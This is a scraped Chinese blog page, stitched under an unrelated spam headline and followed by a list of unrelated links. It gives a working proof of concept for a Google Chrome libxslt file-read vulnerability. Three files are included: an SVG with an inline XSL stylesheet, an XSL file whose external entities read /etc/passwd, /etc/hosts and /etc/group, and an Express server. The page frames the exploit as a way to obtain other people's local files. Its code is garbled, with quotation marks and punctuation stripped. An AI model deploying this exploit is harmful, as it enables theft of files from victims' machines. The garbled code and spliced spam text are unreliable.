当前位置: 首页 > news >正文

越秀网站建设设计2021年建站赚钱

news 2026/5/2 0:18:56
越秀网站建设设计,2021年建站赚钱,原创文章代写平台,佛山新网站建设信息漏洞描述 该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页#xff0c;诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制#xff0c;导致chrome任意文件读取。Li…漏洞描述 该漏洞的存在是由于 Google Chrome 中用户提供的 XML 输入验证不足。远程攻击者可以创建特制网页诱骗受害者访问该网页并获取用户系统上的敏感信息。远程攻击者可利用该漏洞通过构建的 HTML 页面绕过文件访问限制导致chrome任意文件读取。Libxslt 是在基于 WebKit 的浏览器如 chromesafari 等中默认使用的 XSL 库。Libxslt 允许 XSL document() 方法加载的文档内部存在外部实体。攻击者可以绕过安全限制从 http(s):// 网址访问 file:// 网址并获取文件访问权限 影响的版本Google Chrome 116.0.5845.96 效果如下 Google Chrome下载地址https://registry.npmmirror.com/binary.html?pathchromedriver/ 根据自己需求下载即可 这里我们要用到三个文件将这三个文件传入到自己搭建的web服务文件中即可也可以是博客网站的文件中总之是可以用浏览器访问的就好那我们看那三个文件吧 test.svg ?xml version1.0 encodingUTF-8? ?xml-stylesheet typetext/xsl href#?xsl:stylesheet idcolor-change version1.0 xmlns:xslhttp://www.w3.org/1999/XSL/Transformxsl:template match/svg version1.1 idCapa_1 xmlnshttp://www.w3.org/2000/svg xmlns:xlinkhttp://www.w3.org/1999/xlink x0px y0px viewBox0 0 1000 1000foreignObject idmyObj width1000 height1000div stylefont-size:xxx-large xmlnshttp://www.w3.org/1999/xhtmla href##Copy me#/abr/XSL: xsl:value-of selectsystem-property(xsl:version)/br/Vendor: xsl:value-of selectsystem-property(xsl:vendor)/br/Vendor URL: xsl:value-of selectsystem-property(xsl:vendor-url)/br/document() xsl:copy-of selectdocument(test.xsl)//div/foreignObject/svg/xsl:template /xsl:stylesheet text.xsl ?xml version1.0 encodingUTF-8? !DOCTYPE p [ !ENTITY passwd SYSTEM file:///etc/passwd !ENTITY hosts SYSTEM file:///etc/hosts !ENTITY group SYSTEM file://localhost/etc/group ] pp styleborder-style: dotted;/etc/passwd: passwd;/pp styleborder-style: dotted;/etc/hosts: hosts;/pp styleborder-style: dotted;/etc/group: group;/p /p server.js const express require(express); const path require(path);const app express(); const port 3000;app.get(/test.svg, (req, res) {res.sendFile(path.join(__dirname, test.svg)); });app.get(/test.xsl, (req, res) {res.set(Access-Control-Allow-Origin, *);res.sendFile(path.join(__dirname, test.xsl)); });app.listen(port, () {console.log(Example app listening on port ${port}); });要将这三个文件放到自己搭建的web服务的文件中即可也可以是博客网站的文件下 注意这里的三个文件是linux的版本也就是说Google Chrome也要是linux版本的才可以用如果要用windows版本的则需要对这三个文件进行修改然后下个windows版本的Google Chrome即可 而这里要注意的是我们必须要用Google Chrome才能获取到别人的信息 用Google Chrome打开上面的上传的文件如http://xxx.xxx.xxx/test.svg 然后我们就可以看到如下图所示获取到别人的本机的 passwd 文件和 hosts 文件
http://www.hkea.cn/news/14494765/

相关文章:

  • 做html网站搜索框教程怎么看网站是不是做竞价
  • 百度搜索不到我的网站uc官方网站开发中心
  • 商机互联公司做网站怎么样dede小视频网站源码
  • 南京那些公司做网站游戏点卡平台网站开发
  • 平罗县住房和城乡建设局网站用源码做自己的网站
  • 梁山网站建设费用天猫网站设计特点
  • 公司做网站需要多少钱ui设计专业
  • 资源网站排名优化seoasp.net网站发布到虚拟主机
  • 800元五合一建站南京蓝牙app开发公司
  • 简洁企业网站源码棋牌网站建设要多少钱
  • iis如何发布asp.net网站做网站备案地点
  • 列出寻找网站关键词的几种途径图片制作的标准是什么
  • 网站中做背景图片位置咋写南宁企业建站系统模板
  • 知名的家居行业网站开发制作一个网站数据库怎么做
  • 找人做网站需要注意什么如何设计公众号
  • 怎样用dw做 网站首页做网站哪些公司好
  • 一个设计网站多少钱wordpress 模板破解版
  • wordpress的网站是php的代码wordpress文章多个分类显示不出来
  • 做网站作品是静态wordpress 多语言插件
  • 做标志的网站网站已备案下一步怎么做
  • 信阳网站设计古玩网站建设意义
  • mvc 网站开发百度竞价排名机制
  • 玩具 网站模板成都农业网站建设
  • 网站被墙了怎么办通州郑州阳网站建设
  • 枣阳网站开发公司哪家好广州模板建站软件
  • 国外设计素材网站如何建设学校门户网站
  • 手机可以开发网站临安建设投标网站
  • 域名是否就是网站在线阅读小说网站怎么建设
  • 用ps做零食网站模板wordpress添加管理员
  • 医疗器械类网站前置审批快速搭建网站前端